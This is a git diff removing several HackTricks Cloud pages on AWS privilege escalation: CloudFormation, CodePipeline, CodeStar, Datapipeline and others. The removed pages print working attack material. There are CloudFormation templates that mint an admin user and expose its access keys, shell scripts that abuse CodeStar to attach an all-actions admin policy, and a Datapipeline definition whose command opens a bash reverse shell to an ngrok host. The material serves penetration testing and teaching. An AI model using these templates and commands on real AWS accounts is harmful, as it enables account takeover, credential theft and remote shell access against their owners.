-{% endhint %} - -## AWS Privilege Escalation - -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. - -{% hint style="warning" %} -AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. -{% endhint %} - -{% hint style="danger" %} -If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -So remember that this is another way to **grant privileged permissions** to a principal. -{% endhint %} - -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** - -## Tools - -* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md deleted file mode 100644 index 7294ee888..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ /dev/null @@ -1,35 +0,0 @@ -# AWS - Chime Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### chime:CreateApiKey - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md deleted file mode 100644 index 8147ce381..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ /dev/null @@ -1,109 +0,0 @@ -# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - -```json -{ - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description" : "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": "*" - }] - }, - "Users": [{ - "Ref": "AdminUser" - }] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": [ - "MyUserKeys", - "SecretAccessKey" - ] - }, - "Description": "Secret Key of Admin User" - } - } -} -``` - -Then **generate the cloudformation stack**: - -```bash -aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 -``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - -```bash -aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 -``` - -### References - -* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md deleted file mode 100644 index d9fdae9de..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - Codepipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## codepipeline - -For more info about codepipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` - -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. - -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) - -I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` - -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: - -![](<../../../.gitbook/assets/image (276).png>) - -![](<../../../.gitbook/assets/image (181).png>) - -### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` - -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. 
- -### `codepipeline:pollforjobs` - -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): - -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md deleted file mode 100644 index 106d50e48..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# AWS - Codestar Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Codestar - -You can find more information about codestar in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codestar:CreateProject` - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: - -{% content-ref url="iam-passrole-codestar-createproject.md" %} -[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md) -{% endcontent-ref %} - -### `codestar:CreateProject`, `codestar:AssociateTeamMember` - -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - -```bash -PROJECT_NAME="supercodestar" - -aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME - -echo "Waiting 1min to start the project" -sleep 60 - -USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') - -aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed -``` - -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. 
You can find an example of that policy in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `codestar:CreateProjectFromTemplate` - -1. **Create a New Project:** - * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - * With the granted CloudFormation permissions, proceed to update the specified stack. - * The stack's name will typically conform to one of two patterns: - * `awscodestar--infrastructure` - * `awscodestar--lambda` - * The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. - -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) - -**Potential Impact:** Privesc to cloudformation IAM role. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md deleted file mode 100644 index 883d19f18..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ /dev/null @@ -1,115 +0,0 @@ -# codestar:CreateProject, codestar:AssociateTeamMember - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -This is the created policy the user can privesc to (the project name was `supercodestar`): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": [ - "codestar:*", - "iam:GetPolicy*", - "iam:ListPolicyVersions" - ], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": [ - "*" - ] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": [ - "arn:aws:iam::947247140022:user/${aws:username}" - ] - } - ] -} -``` - -{% hint 
style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md deleted file mode 100644 index 60d1b28c4..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ /dev/null @@ -1,118 +0,0 @@ -# iam:PassRole, codestar:CreateProject - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: - -{% code title="toolchain.json" %} -```json -{ - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [ - "" - ] - } - } - } -} -``` -{% endcode %} - -Also **upload** this `empty zip` file to the **bucket**: - -{% file src="../../../../.gitbook/assets/empty.zip" %} - -Remember that the **bucket with both files must be accessible by the victim account**. 
- -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: - -```bash -PROJECT_NAME="supercodestar" - -# Crecte the source JSON -## In this JSON the bucket and key (path) to the empry.zip file is used -SOURCE_CODE_PATH="/tmp/surce_code.json" -SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } -]" -printf "$SOURCE_CODE" > $SOURCE_CODE_PATH - -# Create the toolchain JSON -## In this JSON the bucket and key (path) to the toolchain.json file is used -TOOLCHAIN_PATH="/tmp/tool_chain.json" -TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" -}" -printf "$TOOLCHAIN" > $TOOLCHAIN_PATH - -# Create the codestar project that will use the cloudformation epxloit to privesc -aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH -``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md deleted file mode 100644 index 4e5b80724..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ /dev/null @@ -1,100 +0,0 @@ -# AWS - Datapipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## datapipeline - -For more info about datapipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` - -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - -```bash -aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string -``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - -```json -{ - "objects": [ - { - "id" : "CreateDirectory", - "type" : "ShellCommandActivity", - "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn" : {"ref": "instance"} - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id" : "instance", - "name" : "instance", - "type" : "Ec2Resource", - "actionOnTaskFailure" : "terminate", - "actionOnResourceFailure" : "retryAll", - "maximumRetries" : "1", - "instanceType" : "t2.micro", - "securityGroups" : ["default"], - "role" : "assumable_datapipeline", - "resourceRole" : "assumable_ec2_profile_instance" - }] -} -``` - -{% hint style="info" %} -Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. - -Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). 
-{% endhint %} - -```bash -aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json -``` - -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. - -## References - -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md deleted file mode 100644 index 33898f048..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# AWS - Directory Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
